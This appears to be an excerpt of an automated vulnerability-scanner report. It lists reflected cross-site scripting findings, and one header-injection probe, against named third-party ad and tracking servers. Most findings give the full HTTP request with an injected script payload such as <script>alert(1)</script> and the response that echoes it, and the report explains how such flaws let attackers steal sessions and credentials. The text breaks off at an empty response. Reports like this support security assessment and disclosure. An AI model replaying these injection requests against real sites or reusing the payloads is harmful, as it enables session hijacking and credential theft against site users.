GET /5/c=25/b=1226041?2bdae%0d%0a32111a498f8=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:36 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7YyHDLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwA5%2FRZh; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfydsZDkBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSCjT2irJSNMGMiQEdq0A5lvI7RpEzLfQpnrLzKfWSneBdk8RgYOmTp1dIu4WidhCNU3oAtxJ%2BxCF%2BJ8vBxT1U50Ib6Kt%2BhCsmYX0YUA271YNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Location: http://2bdae 32111a498f8=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
3. Cross-site scripting (reflected)previousnext There are 91 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 5f6c7<script>alert(1)</script>9faa69a0bfd was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=11287695f6c7<script>alert(1)</script>9faa69a0bfd&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:39 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "11287695f6c7<script>alert(1)</script>9faa69a0bfd"
The value of the placementId request parameter is copied into an HTML comment. The payload ce49b--><script>alert(1)</script>7267909dc51 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720ce49b--><script>alert(1)</script>7267909dc51&pid=1128769&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:43:16 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3257
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1430720ce49b--><script>alert(1)</script>7267909dc51" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 78c7f--><script>alert(1)</script>c5a78cccd8b was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=1128769&ps=-178c7f--><script>alert(1)</script>c5a78cccd8b&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1 Host: ads.tw.adsonar.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:44:02 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3696
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-178c7f--><script>alert(1)</script>c5a78cccd8b" -->
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e85e0<script>alert(1)</script>0928072ac46 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/gettoken/?callback=this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46&noCacheIE=1298762276937 HTTP/1.1 Host: alterianwaserver.alterianconnect.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:10 GMT Last-Modified: Sat, 26 Feb 2011 23:20:10 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:09 GMT Content-Length: 137
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2b978<script>alert(1)</script>00c0c3b016f was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/submitevents/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&Session=25aa86a5-ea98-45f3-a174-e3469a6e00b9&callback=this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f&Events=%5B%7B%22EventID%22%3A%221%22%2C%22EventTime%22%3A%22%2FDate(1298762276936)%2F%22%2C%22Asset%22%3A%22http%3A%2F%2Fwebcontent.alterian.com%2F%7Chttp%3A%2F%2Fwebcontent.alterian.com%2F%22%2C%22Value%22%3A%22%22%7D%5D&noCacheIE=1298762279411 HTTP/1.1 Host: alterianwaserver.alterianconnect.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:31 GMT Content-Length: 90
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f4af1<script>alert(1)</script>977a3000986 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tracking.aspx/submitsession/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&callback=this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986&timeoffset=360&scrres=1920%20x%201200&username=&trackedsite=alterian-content-management.com&ref=unknown&noCacheIE=1298762278213 HTTP/1.1 Host: alterianwaserver.alterianconnect.net Proxy-Connection: keep-alive Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Type: application/json; charset=utf-8 Expires: Sat, 26 Feb 2011 23:20:30 GMT Last-Modified: Sat, 26 Feb 2011 23:20:30 GMT Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 26 Feb 2011 23:20:29 GMT Content-Length: 212
The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c54'-alert(1)-'aa8bf6ae2f0 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d8a'%3balert(1)//2ee66e943dc was submitted in the mpvc parameter. This input was echoed as 55d8a';alert(1)//2ee66e943dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a'%3balert(1)//2ee66e943dc HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880
3.9. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/ad/js/3992-121072-16279-0
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8535c'%3balert(1)//a8fa310d924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8535c';alert(1)//a8fa310d924 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c'%3balert(1)//a8fa310d924=1 HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload a5385<script>alert(1)</script>1a4bb3f8d71 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TCTUL001/twidget/1.jsonp?jsonp=jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71&numAuthors=7&numPosts=0&bf=tech&uip=&ua=&ref=http%3A%2F%2Ftechcrunch.com%2F2011%2F02%2F16%2Fforbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links%2F&qh=TechCrunch&format=300x600 HTTP/1.1 Host: api.postup.com Proxy-Connection: keep-alive Referer: http://www.tweetup.com/twidget/twidget.2.300x600.html?partner=TCTUL001&keyword=TechCrunch&backfill=tech&refurl=http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 27 Feb 2011 02:32:03 GMT Content-Type: text/javascript; charset=UTF-8 Connection: keep-alive Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: bc=9CE434E0-6353-4F68-9196-9FD9DBD5DD9E;Path=/;Expires=Wed, 24-Feb-21 02:32:03 GMT Set-Cookie: sc=6148C463-8CE9-4536-981B-E1A093F9C2BB;Path=/ Set-Cookie: bp=NR6mPz0SXEsXB_t8NNHvEsKZO0M;Path=/ CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT Content-Length: 19542
jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71({"users":[{"created_at":"Wed May 19 20:08:01 PDT 2010","description":"News and opinions on technology, internet \u0026 media. Focused on investors, companies and products impacting social and commerci ...[SNIP]...
The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 365ee'%3balert(1)//b377350152c was submitted in the imageurl parameter. This input was echoed as 365ee';alert(1)//b377350152c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee'%3balert(1)//b377350152c&supportedonly=1 HTTP/1.1 Host: apps.conduit-banners.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 27 Feb 2011 03:31:08 GMT Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Vary: Accept-Encoding Content-Length: 4674
function imgToGoOnLoad__806157278(imgObj) {var elm = imgObj,func__806157278 = function(){ SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-App' ...[SNIP]... <img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee';alert(1)//b377350152c" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__806157278(this);" > ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 76688<script>alert(1)</script>2d0cdbe6589 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=876688<script>alert(1)</script>2d0cdbe6589&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:51 GMT Date: Sun, 27 Feb 2011 16:44:51 GMT Connection: close Content-Length: 3594
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload a70f0<script>alert(1)</script>5846377f9ec was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955a70f0<script>alert(1)</script>5846377f9ec&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 4dfb7<script>alert(1)</script>028085d548b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15=4dfb7<script>alert(1)</script>028085d548b HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bc9c3<script>alert(1)</script>3733a91cc15 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113bc9c3<script>alert(1)</script>3733a91cc15&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:52 GMT Date: Sun, 27 Feb 2011 16:44:52 GMT Connection: close Content-Length: 3594
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload aecfe<script>alert(1)</script>494c6cd0f61 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20aecfe<script>alert(1)</script>494c6cd0f61&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:53 GMT Date: Sun, 27 Feb 2011 16:44:53 GMT Connection: close Content-Length: 3594
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8fcd2<script>alert(1)</script>164c2634538 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113&c3=20&c4=48378fcd2<script>alert(1)</script>164c2634538&c5=28380&c6=&c10=175955&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
